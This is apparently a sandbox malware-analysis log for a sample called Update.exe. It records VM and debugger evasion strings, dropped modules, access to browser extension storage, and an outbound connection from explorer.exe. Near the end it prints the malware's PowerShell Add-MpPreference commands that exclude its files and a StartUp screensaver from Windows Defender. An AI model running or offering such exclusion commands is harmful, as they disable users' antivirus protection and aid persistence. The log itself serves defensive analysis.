                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1440Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2030Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1687
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1433
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1737
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3234
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3328
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 487
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2196
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 553
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5289
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 873
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\_lzma.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\_socket.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\_hashlib.pydJump to dropped file
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeDropped PE file which has not been started: C:\Windows\Temp\jxokwqntprmq.sysJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\_decimal.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\_queue.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\python310.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\select.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\unicodedata.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\_bz2.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\_ctypes.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\_sqlite3.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68522\_ssl.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep count: 1440 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep count: 2030 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep count: 1687 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep count: 1433 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep count: 1737 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 311 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8416Thread sleep count: 3234 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8608Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8536Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep count: 3328 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 487 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep count: 2196 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep count: 553 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8464Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 5289 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8844Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 873 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8852Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 7488Thread sleep count: 83 > 30
                    Source: C:\Windows\explorer.exe TID: 7488Thread sleep count: 51 > 30
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F79280 FindFirstFileExW,FindClose,0_2_00007FF623F79280
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF623F783C0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F91874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF623F91874
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F79280 FindFirstFileExW,FindClose,1_2_00007FF623F79280
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F91874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF623F91874
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F783C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF623F783C0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,1_2_00007FFDFAFA322E
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFE0130FEB0 GetSystemInfo,1_2_00007FFE0130FEB0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior
                    Source: Update.exe, 00000001.00000003.1677786789.000002D8F6114000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtrayZ
                    Source: Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer6
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
                    Source: Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuserZ
                    Source: Update.exe, 00000001.00000003.1677786789.000002D8F6114000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-gaZ
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
                    Source: Update.exe, 00000001.00000003.1677786789.000002D8F6114000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvcZ
                    Source: Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                    Source: Update.exe, 00000001.00000003.1682000072.000002D8F6F6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^<+q@1hGfsD3h
                    Source: Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxserviceZ
                    Source: Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
                    Source: Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretrayZ
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
                    Source: Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer6Z
                    Source: Update.exe, 00000001.00000003.1918927890.000002D8F647D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                    Source: Update.exe, 00000001.00000002.1982892072.000002D8F5F80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                    Source: Update.exe, 00000001.00000003.1678909991.000002D8F6139000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvcZ
                    Source: Update.exe, 00000001.00000002.1983074177.000002D8F6080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Potentially malicious time measurement code found
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA57311_2_00007FFDFAFA5731
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA42461_2_00007FFDFAFA4246
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA5731 rdtsc 1_2_00007FFDFAFA5731
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F8A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF623F8A614
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAF91AA0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAF91AA0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F93480 GetProcessHeap,0_2_00007FF623F93480
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F8A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF623F8A614
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F7C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF623F7C8A0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F7D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF623F7D12C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F7D30C SetUnhandledExceptionFilter,0_2_00007FF623F7D30C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F8A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF623F8A614
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F7C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF623F7C8A0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F7D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF623F7D12C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FF623F7D30C SetUnhandledExceptionFilter,1_2_00007FF623F7D30C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA113028 IsProcessorFeaturePresent,00007FFE133319A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE133319A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFA113028
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAEE2009 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAEE2009
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAFA5A24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAFA5A24
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFE1334004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE1334004C
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 15_2_00401475 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,15_2_00401475
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_c_exit,17_2_00007FF633FE118B
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,17_2_00007FF633FE11D8
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,97_2_00007FF771DB118B
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeCode function: 97_2_00007FF771DB11D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,97_2_00007FF771DB11D8
                    Source: C:\Windows\System32\conhost.exeCode function: 113_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,113_2_0000000140001160
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 45.76.89.70 80
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
